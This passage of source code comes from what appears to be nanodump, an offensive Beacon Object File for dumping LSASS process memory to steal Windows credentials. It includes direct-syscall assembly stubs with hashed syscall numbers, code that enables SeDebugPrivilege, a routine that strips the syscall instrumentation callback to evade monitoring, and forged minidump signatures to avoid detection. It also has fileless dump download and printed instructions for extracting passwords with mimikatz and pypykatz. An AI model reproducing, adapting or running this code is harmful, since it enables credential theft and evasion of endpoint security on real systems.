        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtMapViewOfSection(
    IN HANDLE SectionHandle,
    IN HANDLE ProcessHandle,
    IN OUT PVOID BaseAddress,
    IN ULONG ZeroBits,
    IN SIZE_T CommitSize,
    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
    IN OUT PSIZE_T ViewSize,
    IN SECTION_INHERIT InheritDisposition,
    IN ULONG AllocationType,
    IN ULONG Win32Protect)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x7A2D5C79 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x7A2D5C79 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtUnmapViewOfSection(
    IN HANDLE ProcessHandle,
    IN PVOID BaseAddress)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0xCA1ACC8F \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0xCA1ACC8F \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}

__declspec(naked) NTSTATUS NtImpersonateThread(
    IN HANDLE ThreadHandle,
    IN HANDLE ThreadToImpersonate,
    IN PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService)
{
#if defined(_WIN64)
    asm(
        SET_SYNTAX
        "mov [rsp +8], rcx \n"
        "mov [rsp+16], rdx \n"
        "mov [rsp+24], r8 \n"
        "mov [rsp+32], r9 \n"
        "mov rcx, 0x0C26D619 \n"
        "push rcx \n"
        "sub rsp, 0x28 \n"
        "call SW3_GetSyscallAddress \n"
        "add rsp, 0x28 \n"
        "pop rcx \n"
        "push rax \n"
        "sub rsp, 0x28 \n"
        "call SW2_GetSyscallNumber \n"
        "add rsp, 0x28 \n"
        "pop r11 \n"
        "mov rcx, [rsp+8] \n"
        "mov rdx, [rsp+16] \n"
        "mov r8, [rsp+24] \n"
        "mov r9, [rsp+32] \n"
        "mov r10, rcx \n"
        "jmp r11 \n"
    );
#else
    asm(
        SET_SYNTAX
        "push 0x0C26D619 \n"
        "call SW3_GetSyscallAddress \n"
        "pop ebx \n"
        "push eax \n"
        "push ebx \n"
        "call SW2_GetSyscallNumber \n"
        "add esp, 4 \n"
        "pop ebx \n"
        "mov edx, esp \n"
        "sub edx, 4 \n"
        "call ebx \n"
        "ret \n"
    );
#endif
}


#endif


================================================
FILE: Creds-BOF/nanodump/source/token_priv.c
================================================
#include "token_priv.h"
#if defined(NANO) && defined(BOF)
#include "dinvoke.c"
#endif

#if !defined(SSP)

BOOL enable_impersonate_priv(VOID)
{
    BOOL success = check_token_privilege(
        NULL,
        L"SeImpersonatePrivilege",
        TRUE);
    if (!success)
    {
        PRINT_ERR("Could not enable SeImpersonatePrivilege. Are you elevated?");
    }
    return success;
}

BOOL enable_debug_priv(VOID)
{
    BOOL success = check_token_privilege(
        NULL,
        SeDebugPrivilege,
        TRUE);
    if (!success)
    {
        PRINT_ERR("Could not enable SeDebugPrivilege. Are you elevated?");
    }
    return success;
}

BOOL check_token_privileges(
    IN HANDLE hToken OPTIONAL,
    IN LPCWSTR ppwszRequiredPrivileges[],
    IN ULONG32 dwNumRequiredPrivileges,
    IN BOOL bEnablePrivilege)
{
    BOOL success = FALSE;
    BOOL own_token = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    if (!ppwszRequiredPrivileges || !dwNumRequiredPrivileges)
        return TRUE;

    if (!hToken)
    {
        // get a handle to our token
        own_token = TRUE;
        status = NtOpenProcessToken(
            NtCurrentProcess(),
            TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
            &hToken);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtOpenProcessToken", status);
            goto end;
        }
    }

    for (ULONG32 i = 0; i < dwNumRequiredPrivileges; i++)
    {
        // make sure we have all the privileges we need
        success = check_token_privilege(
            hToken,
            ppwszRequiredPrivileges[i],
            bEnablePrivilege);
        if (!success && own_token && bEnablePrivilege)
        {
            PRINT_ERR("A privilege is missing: %ls. Are you elevated?", ppwszRequiredPrivileges[i]);
            goto end;
        }
        else if (!success)
        {
            PRINT_ERR("A privilege is missing: %ls", ppwszRequiredPrivileges[i]);
            goto end;
        }
    }

    success = TRUE;

end:
    if (own_token && hToken)
        NtClose(hToken);

    return success;
}

BOOL check_token_privilege(
    IN HANDLE hToken OPTIONAL,
    IN LPCWSTR pwszPrivilege,
    IN BOOL bEnablePrivilege)
{
    BOOL bReturnValue = FALSE;
    ULONG dwTokenPrivilegesSize = 8, i = 0, dwPrivilegeNameLength = 0;
    ULONG dwPrevTokenPrivilegesSize = dwTokenPrivilegesSize;
    PTOKEN_PRIVILEGES pTokenPrivileges = NULL;
    LookupPrivilegeNameW_t LookupPrivilegeNameW;
    LUID_AND_ATTRIBUTES laa = { 0 };
    TOKEN_PRIVILEGES tkp = { 0 };
    PRIVILEGE_SET priv_set = { 0 };
    LPWSTR pwszPrivilegeNameTemp = NULL;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    BOOL own_token = FALSE;
    BOOL success = FALSE;
    BOOL found_priv = FALSE;

    LookupPrivilegeNameW = (LookupPrivilegeNameW_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        LookupPrivilegeNameW_SW2_HASH,
        0);
    if (!LookupPrivilegeNameW)
    {
        api_not_found("LookupPrivilegeNameW");
        goto end;
    }

    if (!hToken)
    {
        // get a handle to our token
        own_token = TRUE;
        status = NtOpenProcessToken(
            NtCurrentProcess(),
            TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
            &hToken);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtOpenProcessToken", status);
            goto end;
        }
    }

    do
    {
        dwPrevTokenPrivilegesSize = dwTokenPrivilegesSize;
        pTokenPrivileges = intAlloc(dwTokenPrivilegesSize);
        if (!pTokenPrivileges)
        {
            malloc_failed();
            goto end;
        }

        status = NtQueryInformationToken(
            hToken,
            TokenPrivileges,
            pTokenPrivileges,
            dwTokenPrivilegesSize,
            &dwTokenPrivilegesSize);
        if (NT_SUCCESS(status))
            break;

        DATA_FREE(pTokenPrivileges, dwPrevTokenPrivilegesSize);
    } while (status == STATUS_BUFFER_TOO_SMALL);

    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationToken", status);
        goto end;
    }

    for (i = 0; i < pTokenPrivileges->PrivilegeCount; i++)
    {
        laa = pTokenPrivileges->Privileges[i];
        dwPrivilegeNameLength = 0;

        success = LookupPrivilegeNameW(
            NULL,
            &laa.Luid,
            NULL,
            &dwPrivilegeNameLength);
        if (success || GetLastError() != ERROR_INSUFFICIENT_BUFFER)
        {
            function_failed("LookupPrivilegeNameW");
            goto end;
        }
        dwPrivilegeNameLength++;

        pwszPrivilegeNameTemp = intAlloc(dwPrivilegeNameLength * sizeof(WCHAR));
        if (!pwszPrivilegeNameTemp)
        {
            malloc_failed();
            goto end;
        }

        success = LookupPrivilegeNameW(
            NULL,
            &laa.Luid,
            pwszPrivilegeNameTemp,
            &dwPrivilegeNameLength);
        if (!success)
        {
            function_failed("LookupPrivilegeNameW");
            goto end;
        }

        if (!_wcsicmp(pwszPrivilegeNameTemp, pwszPrivilege))
        {
            // found it
            found_priv = TRUE;

            // test if already enabled
            priv_set.PrivilegeCount = 1;
            priv_set.Privilege[0].Luid = laa.Luid;
            priv_set.Privilege[0].Attributes = laa.Attributes;
            status = NtPrivilegeCheck(
                hToken,
                &priv_set,
                &bReturnValue);
            if (!NT_SUCCESS(status))
            {
                syscall_failed("NtPrivilegeCheck", status);
                bReturnValue = FALSE;
                goto end;
            }

            if (bReturnValue)
            {
                DPRINT("Privilege %ls was already enabled", pwszPrivilegeNameTemp);
            }

            if (!bReturnValue && bEnablePrivilege)
            {
                tkp.PrivilegeCount = 1;
                tkp.Privileges[0].Luid = laa.Luid;
                tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

                status = NtAdjustPrivilegesToken(
                    hToken,
                    FALSE,
                    &tkp,
                    sizeof(TOKEN_PRIVILEGES),
                    NULL,
                    NULL);
                if (!NT_SUCCESS(status))
                {
                    syscall_failed("NtAdjustPrivilegesToken", status);
                    goto end;
                }
                DPRINT("Enabled %ls", pwszPrivilegeNameTemp);
                bReturnValue = TRUE;
            }

            if (!bReturnValue && !bEnablePrivilege)
            {
                DPRINT("The privilege %ls is not enabled", pwszPrivilegeNameTemp);
            }

            break;
        }
        DATA_FREE(pwszPrivilegeNameTemp, wcslen(pwszPrivilegeNameTemp) * sizeof(WCHAR));
    }

    if (!found_priv)
    {
        DPRINT_ERR("The privilege %ls was not found", pwszPrivilege);
    }

end:
    if (pTokenPrivileges)
    {
        DATA_FREE(pTokenPrivileges, dwTokenPrivilegesSize);
    }
    if (pwszPrivilegeNameTemp)
    {
        DATA_FREE(pwszPrivilegeNameTemp, wcslen(pwszPrivilegeNameTemp) * sizeof(WCHAR));
    }
    if (own_token && hToken)
        NtClose(hToken);

    return bReturnValue;
}

#endif


================================================
FILE: Creds-BOF/nanodump/source/utils.c
================================================
#include "utils.h"
#include "handle.h"
#include "dinvoke.h"
#include "syscalls.h"
#include "adaptix.h"

#ifndef SSP

BOOL print_shtinkering_crash_location(VOID)
{
    BOOL ret_val = FALSE;
    DWORD bufferSize = 300;
    LPWSTR env_var = NULL;
    BOOL success = FALSE;

    env_var = intAlloc(bufferSize);
    if (!env_var)
    {
        malloc_failed();
        goto cleanup;
    }

    success = get_env_var(L"LocalAppData", env_var, bufferSize);
    if (!success)
        goto cleanup;

    PRINT("Done, run: dir %ls\\CrashDumps\\", env_var);

    ret_val = TRUE;

cleanup:
    if (env_var)
    {
        DATA_FREE(env_var, bufferSize);
    }

    return ret_val;
}

BOOL get_env_var(
    IN LPWSTR name,
    OUT LPWSTR value,
    IN DWORD size)
{
    BOOL ret_val = FALSE;
    GetEnvironmentVariableW_t GetEnvironmentVariableW = NULL;

    GetEnvironmentVariableW = (GetEnvironmentVariableW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        GetEnvironmentVariableW_SW2_HASH,
        0);
    if (!GetEnvironmentVariableW)
    {
        api_not_found("GetEnvironmentVariableW");
        goto cleanup;
    }

    size = GetEnvironmentVariableW(name, value, size);
    if (!size)
    {
        DPRINT_ERR("Retrieving %ls failed", value);
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

// https://github.com/kevoreilly/capemon/blob/940c76cc17c4daefbf11f6cd932a9dece472ace1/hook_sleep.c#L502
DWORD get_tick_count(VOID)
{
    PVOID pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    ULONG32 MajorVersion = *RVA(PULONG32, pPeb, OSMAJORVERSION_OFFSET);

    if (MajorVersion >= 6)
        return (DWORD)((*(ULONGLONG *)0x7ffe0320 * *(DWORD *)0x7ffe0004) >> 24);
    else
        return (DWORD)(((ULONGLONG)*(DWORD *)0x7ffe0000 * *(DWORD *)0x7ffe0004) >> 24);
}

#endif

BOOL find_process_id_by_name(
    IN LPCSTR process_name,
    OUT PDWORD pPid)
{
    BOOL success = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    HANDLE hProcess = NULL;
    PUNICODE_STRING image = NULL;
    ULONG image_size = 0;
    WCHAR wprocess_name[MAX_PATH] = { 0 };
    LPWSTR current_process = NULL;
    *pPid = 0;

    if (!process_name)
        goto end;

    mbstowcs(wprocess_name, process_name, MAX_PATH);

    while (TRUE)
    {
        /*
         * loop over each process
         */
        status = NtGetNextProcess(
            hProcess,
            PROCESS_QUERY_INFORMATION,
            0,
            0,
            &hProcess);
        if (status == STATUS_NO_MORE_ENTRIES)
        {
            PRINT_ERR("The process '%s' was not found", process_name);
            goto end;
        }
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtGetNextProcess", status);
            goto end;
        }

        /*
         * get the full path of the process binary
         */

        success = get_process_image(
            hProcess,
            &image,
            &image_size);
        if (!success)
            continue;

        if (image->Length == 0)
        {
            DATA_FREE(image, image_size);
            continue;
        }

        /*
         * get the  process name
         */
        current_process = &wcsrchr(image->Buffer, '\\')[1];

        /*
         * we always return the first match, ignore the rest if any
         */
        if (!_wcsicmp(current_process, wprocess_name))
        {
            DATA_FREE(image, image_size);
            /*
             * get the PID of the process
             */
            *pPid = get_pid(hProcess);
            break;
        }

        DATA_FREE(image, image_size);
    }

    if (*pPid)
        success = TRUE;

end:
    if (hProcess)
        NtClose(hProcess);
    if (image)
    {
        DATA_FREE(image, image_size);
    }

    return success;
}

BOOL is_full_path(
    IN LPCSTR filename)
{
    char c;

    if (filename[0] == filename[1] && filename[1] == '\\')
        return TRUE;

    c = filename[0] | 0x20;
    if (c < 97 || c > 122)
        return FALSE;

    c = filename[1];
    if (c != ':')
        return FALSE;

    c = filename[2];
    if (c != '\\')
        return FALSE;

    return TRUE;
}

VOID get_full_path(
    OUT PUNICODE_STRING full_dump_path,
    IN LPCSTR filename)
{
    wchar_t wcFileName[MAX_PATH];

    // add \??\ at the start
    wcsncpy(full_dump_path->Buffer, L"\\??\\", MAX_PATH);
    // if it is just a relative path, add the current directory
    if (!is_full_path(filename))
        wcsncat(full_dump_path->Buffer, get_cwd(), MAX_PATH);
    // convert the path to wide string
    mbstowcs(wcFileName, filename, MAX_PATH);
    // add the file path
    wcsncat(full_dump_path->Buffer, wcFileName, MAX_PATH);
    // set the length fields
    full_dump_path->Length = (USHORT)wcsnlen(full_dump_path->Buffer, MAX_PATH);
    full_dump_path->Length *= 2;
    full_dump_path->MaximumLength = full_dump_path->Length + 2;
}

LPCWSTR get_cwd(VOID)
{
    PVOID pPeb;
    PPROCESS_PARAMETERS pProcParams;

    pPeb = (PVOID)READ_MEMLOC(PEB_OFFSET);
    pProcParams = *RVA(PPROCESS_PARAMETERS*, pPeb, PROCESS_PARAMETERS_OFFSET);
    return pProcParams->CurrentDirectory.DosPath.Buffer;
}

BOOL write_file(
    IN PUNICODE_STRING full_dump_path,
    IN PBYTE fileData,
    IN ULONG32 fileLength)
{
    HANDLE hFile = NULL;
    OBJECT_ATTRIBUTES objAttr = { 0 };
    IO_STATUS_BLOCK IoStatusBlock;
    LARGE_INTEGER largeInteger = { 0 };
    largeInteger.QuadPart = fileLength;

    // init the object attributes
    InitializeObjectAttributes(
        &objAttr,
        full_dump_path,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);
    // create the file
    NTSTATUS status = NtCreateFile(
        &hFile,
        FILE_GENERIC_WRITE,
        &objAttr,
        &IoStatusBlock,
        &largeInteger,
        FILE_ATTRIBUTE_NORMAL,
        0,
        FILE_OVERWRITE_IF,
        FILE_SYNCHRONOUS_IO_NONALERT,
        NULL,
        0);
    if (status == STATUS_OBJECT_PATH_NOT_FOUND ||
        status == STATUS_OBJECT_NAME_INVALID)
    {
        PRINT_ERR("The path '%ls' is invalid.", &full_dump_path->Buffer[4]);
        return FALSE;
    }
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateFile", status);
        PRINT_ERR("Could not write the dump %ls", &full_dump_path->Buffer[4]);
        return FALSE;
    }
    // write the dump
    status = NtWriteFile(
        hFile,
        NULL,
        NULL,
        NULL,
        &IoStatusBlock,
        fileData,
        fileLength,
        NULL,
        NULL);
    NtClose(hFile); hFile = NULL;
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtWriteFile", status);
        PRINT_ERR("Could not write the dump %ls", &full_dump_path->Buffer[4]);
        return FALSE;
    }
    DPRINT("0x%x bytes have been written to %ls", fileLength, &full_dump_path->Buffer[4]);
    return TRUE;
}

BOOL create_file(
    IN PUNICODE_STRING full_dump_path)
{
    HANDLE hFile = NULL;
    OBJECT_ATTRIBUTES objAttr = { 0 };
    IO_STATUS_BLOCK IoStatusBlock;

    // init the object attributes
    InitializeObjectAttributes(
        &objAttr,
        full_dump_path,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);

    NTSTATUS status = NtCreateFile(
        &hFile,
        FILE_GENERIC_READ,
        &objAttr,
        &IoStatusBlock,
        NULL,
        FILE_ATTRIBUTE_NORMAL,
        0,
        FILE_OPEN_IF,
        FILE_SYNCHRONOUS_IO_NONALERT,
        NULL,
        0);
    if (status == STATUS_OBJECT_PATH_NOT_FOUND ||
        status == STATUS_OBJECT_NAME_INVALID ||
        status == STATUS_OBJECT_PATH_SYNTAX_BAD)
    {
        PRINT_ERR(
            "The path '%ls' is invalid.",
            &full_dump_path->Buffer[4]);
        return FALSE;
    }
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateFile", status);
        DPRINT_ERR("Could not create file at %ls", &full_dump_path->Buffer[4]);
        return FALSE;
    }
    NtClose(hFile); hFile = NULL;
    DPRINT("File created: %ls", &full_dump_path->Buffer[4]);
    return TRUE;
}

BOOL delete_file(
    IN LPCSTR filepath)
{
    OBJECT_ATTRIBUTES objAttr = { 0 };
    wchar_t wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING UnicodeFilePath = { 0 };
    UnicodeFilePath.Buffer = wcFilePath;

    if (!filepath)
        return TRUE;

    get_full_path(&UnicodeFilePath, filepath);

    // init the object attributes
    InitializeObjectAttributes(
        &objAttr,
        &UnicodeFilePath,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);

    NTSTATUS status = NtDeleteFile(&objAttr);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtDeleteFile", status);
        DPRINT_ERR("Could not delete file: %s", filepath);
        return FALSE;
    }
    DPRINT("Deleted file: %s", filepath);
    return TRUE;
}

BOOL file_exists(
    IN LPCSTR filepath)
{
    HANDLE hFile = NULL;
    OBJECT_ATTRIBUTES objAttr = { 0 };
    IO_STATUS_BLOCK IoStatusBlock;
    LARGE_INTEGER largeInteger = { 0 };
    largeInteger.QuadPart = 0;
    wchar_t wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING UnicodeFilePath = { 0 };
    UnicodeFilePath.Buffer = wcFilePath;

    if (!filepath)
        return FALSE;

    get_full_path(&UnicodeFilePath, filepath);

    // init the object attributes
    InitializeObjectAttributes(
        &objAttr,
        &UnicodeFilePath,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);
    // call NtCreateFile with FILE_OPEN
    NTSTATUS status = NtCreateFile(
        &hFile,
        FILE_GENERIC_READ,
        &objAttr,
        &IoStatusBlock,
        &largeInteger,
        FILE_ATTRIBUTE_NORMAL,
        0,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT,
        NULL,
        0);
    if (status == STATUS_SHARING_VIOLATION)
    {
        DPRINT_ERR("The file is being used by another process");
        return FALSE;
    }
    if (status == STATUS_OBJECT_NAME_NOT_FOUND)
        return FALSE;
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateFile", status);
        DPRINT_ERR("Could check if the file %s exists", filepath);
        return FALSE;
    }
    NtClose(hFile); hFile = NULL;
    return TRUE;
}

BOOL create_folder(
    IN LPCSTR folderpath)
{
    HANDLE hFolder = NULL;
    OBJECT_ATTRIBUTES objAttr = { 0 };
    IO_STATUS_BLOCK IoStatusBlock;
    LARGE_INTEGER largeInteger = { 0 };
    largeInteger.QuadPart = 0;
    wchar_t wcFilePath[MAX_PATH] = { 0 };
    UNICODE_STRING UnicodeFolderPath = { 0 };
    UnicodeFolderPath.Buffer = wcFilePath;
    get_full_path(&UnicodeFolderPath, folderpath);

    // init the object attributes
    InitializeObjectAttributes(
        &objAttr,
        &UnicodeFolderPath,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);
    // call NtCreateFile with FILE_OPEN and FILE_DIRECTORY_FILE
    NTSTATUS status = NtCreateFile(
        &hFolder,
        FILE_GENERIC_READ,
        &objAttr,
        &IoStatusBlock,
        &largeInteger,
        FILE_ATTRIBUTE_NORMAL,
        0,
        FILE_CREATE,//FILE_OPEN,
        FILE_DIRECTORY_FILE,
        NULL,
        0);
    if (status == STATUS_OBJECT_NAME_COLLISION)
        return TRUE;
    if (status == STATUS_OBJECT_NAME_NOT_FOUND)
        return FALSE;
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateFile", status);
        DPRINT_ERR("Could check if the folder %s exists", folderpath);
        return FALSE;
    }

    NtClose(hFolder); hFolder = NULL;
    return TRUE;
}

BOOL remove_syscall_callback_hook(VOID)
{
    // you can remove this function by providing the compiler flag: -DNOSYSHOOK
#ifndef NOSYSHOOK
    PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION process_information = { 0 };
#ifdef _WIN64
    process_information.Version = 0;
#else
    process_information.Version = 1;
#endif
    process_information.Reserved = 0;
    process_information.Callback = NULL; // remove the callback function, if any

    NTSTATUS status = NtSetInformationProcess_(
        NtCurrentProcess(),
        ProcessInstrumentationCallback,
        &process_information,
        sizeof(PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION));
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetInformationProcess", status);
        DPRINT_ERR("Failed to remove the syscall callback hook");
        return FALSE;
    }
    else
    {
        DPRINT("The syscall callback hook was set to NULL");
    }
#endif
    return TRUE;
}

VOID free_linked_list(
    IN PVOID head,
    IN ULONG node_size)
{
    if (!head)
        return;

    Plinked_list node = (Plinked_list)head;
    ULONG32 number_of_nodes = 0;
    while (node)
    {
        number_of_nodes++;
        node = node->next;
    }

    for (int i = number_of_nodes - 1; i >= 0; i--)
    {
        node = (Plinked_list)head;

        int jumps = i;
        while (jumps--)
            node = node->next;

        DATA_FREE(node, node_size);
    }
}

PVOID allocate_memory(
    OUT PSIZE_T region_size)
{
    PVOID base_address = NULL;
    NTSTATUS status = NtAllocateVirtualMemory(
        NtCurrentProcess(),
        &base_address,
        0,
        region_size,
        MEM_COMMIT,
        PAGE_READWRITE);
    if (!NT_SUCCESS(status))
    {

        DPRINT_ERR(
            "Could not allocate enough memory to write the dump");
        return NULL;
    }
    DPRINT(
        "Allocated 0x%llx bytes at 0x%p to write the dump",
        (ULONG64)*region_size, base_address);
    return base_address;
}

// for example, encrypt the dump with an XOR key
VOID encrypt_dump(
    IN PVOID base_address,
    IN SIZE_T region_size)
{
    UNUSED(base_address);
    UNUSED(region_size);
    //BYTE key = 0x2e;
    //PBYTE addr = NULL;

    //if (!base_address)
    //    return;

    //for (SIZE_T i = 0; i < region_size; i++)
    //{
    //    addr = RVA(PBYTE, base_address, i);
    //    *addr ^= key;
    //}
}

VOID erase_dump_from_memory(
    IN PVOID base_address,
    IN SIZE_T region_size)
{
    if (!base_address || !region_size)
        return;

    // delete all trace of the dump from memory
    memset(base_address, 0, region_size);
    // free the memory area where the dump was
    region_size = 0;
    NTSTATUS status = NtFreeVirtualMemory(
        NtCurrentProcess(),
        &base_address,
        &region_size,
        MEM_RELEASE);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtFreeVirtualMemory", status);
        DPRINT_ERR("Could not erased the dump from memory");
    }
    else
    {
        DPRINT("Erased the dump from memory");
    }
}

VOID generate_invalid_sig(
    OUT PULONG32 Signature,
    OUT PUSHORT Version,
    OUT PUSHORT ImplementationVersion)
{
    time_t t;
    srand((unsigned) time(&t));

    *Signature             = MINIDUMP_SIGNATURE;
    *Version               = MINIDUMP_VERSION;
    *ImplementationVersion = MINIDUMP_IMPL_VERSION;

    while (*Signature             == MINIDUMP_SIGNATURE ||
           *Version               == MINIDUMP_VERSION ||
           *ImplementationVersion == MINIDUMP_IMPL_VERSION)
    {
        *Signature  = 0;
        *Signature |= (rand() & 0x7FFF) << 0x11;
        *Signature |= (rand() & 0x7FFF) << 0x02;
        *Signature |= (rand() & 0x0003) << 0x00;

        *Version  = 0;
        *Version |= (rand() & 0xFF) << 0x08;
        *Version |= (rand() & 0xFF) << 0x00;

        *ImplementationVersion  = 0;
        *ImplementationVersion |= (rand() & 0xFF) << 0x08;
        *ImplementationVersion |= (rand() & 0xFF) << 0x00;
    }
}

#if defined(NANO) && defined(BOF)

BOOL download_file( IN DWORD chunk_size, IN LPCSTR fileName, IN char fileData[], IN ULONG32 fileLength)
{
    AxDownloadMemory((char*)fileName, (char*)fileData, (int)fileLength);
    DPRINT("The dump was downloaded filessly");
    return TRUE;
}

#endif

#if (defined(NANO) || defined(PPL_DUMP) || defined(PPL_MEDIC) || defined(SSP))

BOOL wait_for_process(
    IN HANDLE hProcess)
{
    NTSTATUS status = NtWaitForSingleObject(
        hProcess,
        TRUE,
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtWaitForSingleObject", status);
        DPRINT_ERR("Could not wait for process");
        return FALSE;
    }
    return TRUE;
}

VOID print_success(
    IN LPCSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL write_dump_to_disk)
{
    if (!use_valid_sig)
    {
        PRINT(
            "The minidump has an invalid signature, restore it running:\nscripts/restore_signature %s",
            strrchr(dump_path, '\\')? &strrchr(dump_path, '\\')[1] : dump_path);
    }
    if (write_dump_to_disk)
    {
#ifdef BOF
        PRINT(
            "Done, to download the dump run:\ndownload %s\nto get the secretz run:\npython3 -m pypykatz lsa minidump %s\nmimikatz.exe \"sekurlsa::minidump %s\" \"sekurlsa::logonPasswords full\" exit",
            dump_path,
            strrchr(dump_path, '\\')? &strrchr(dump_path, '\\')[1] : dump_path,
            strrchr(dump_path, '\\')? &strrchr(dump_path, '\\')[1] : dump_path);
#else
        PRINT(
            "Done, to get the secretz run:\npython3 -m pypykatz lsa minidump %s\nmimikatz.exe \"sekurlsa::minidump %s\" \"sekurlsa::logonPasswords full\" exit",
            strrchr(dump_path, '\\')? &strrchr(dump_path, '\\')[1] : dump_path,
            strrchr(dump_path, '\\')? &strrchr(dump_path, '\\')[1] : dump_path);
#endif
    }
    else
    {
        PRINT(
            "Done, to get the secretz run:\npython3 -m pypykatz lsa minidump %s\nmimikatz.exe \"sekurlsa::minidump %s\" \"sekurlsa::logonPasswords full\" exit",
            dump_path,
            dump_path);
    }
}

#endif

BOOL get_process_image(
    IN HANDLE hProcess,
    OUT PUNICODE_STRING* process_image,
    OUT PULONG buffer_size)
{
    NTSTATUS status;
    ULONG BufferLength = 0x200;
    ULONG PrevBufferLength = BufferLength;
    PVOID buffer;
    do
    {
        PrevBufferLength = BufferLength;
        buffer = intAlloc(BufferLength);
        if (!buffer)
        {
            malloc_failed();
            DPRINT_ERR("Could not get the image of process");
            return FALSE;
        }
        status = NtQueryInformationProcess(
            hProcess,
            ProcessImageFileName,
            buffer,
            BufferLength,
            &BufferLength);
        if (NT_SUCCESS(status))
        {
            *process_image = buffer;
            *buffer_size = BufferLength;
            return TRUE;
        }

        DATA_FREE(buffer, PrevBufferLength);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    syscall_failed("NtQueryInformationProcess", status);
    DPRINT_ERR("Could not get the image of process");
    return FALSE;
}

DWORD get_pid(
    IN HANDLE hProcess)
{
    PROCESS_BASIC_INFORMATION basic_info;
    basic_info.UniqueProcessId = 0;
    PROCESSINFOCLASS ProcessInformationClass = 0;
    NTSTATUS status = NtQueryInformationProcess(
        hProcess,
        ProcessInformationClass,
        &basic_info,
        sizeof(PROCESS_BASIC_INFORMATION),
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationProcess", status);
        return 0;
    }

    return (DWORD)basic_info.UniqueProcessId;
}

DWORD get_tid(
    IN HANDLE hThread)
{
    THREAD_BASIC_INFORMATION basic_info = { 0 };
    THREADINFOCLASS ProcessInformationClass = 0;

    NTSTATUS status = _NtQueryInformationThread(
        hThread,
        ProcessInformationClass,
        &basic_info,
        sizeof(THREAD_BASIC_INFORMATION),
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryInformationThread", status);
        return 0;
    }

    return (DWORD)(ULONG_PTR)basic_info.ClientId.UniqueThread;
}

#if defined(NANO) && !defined(SSP)

BOOL is_lsass(
    IN HANDLE hProcess)
{
    PUNICODE_STRING image = NULL;
    ULONG image_size = 0;
    BOOL success = FALSE;

    success = get_process_image(
        hProcess,
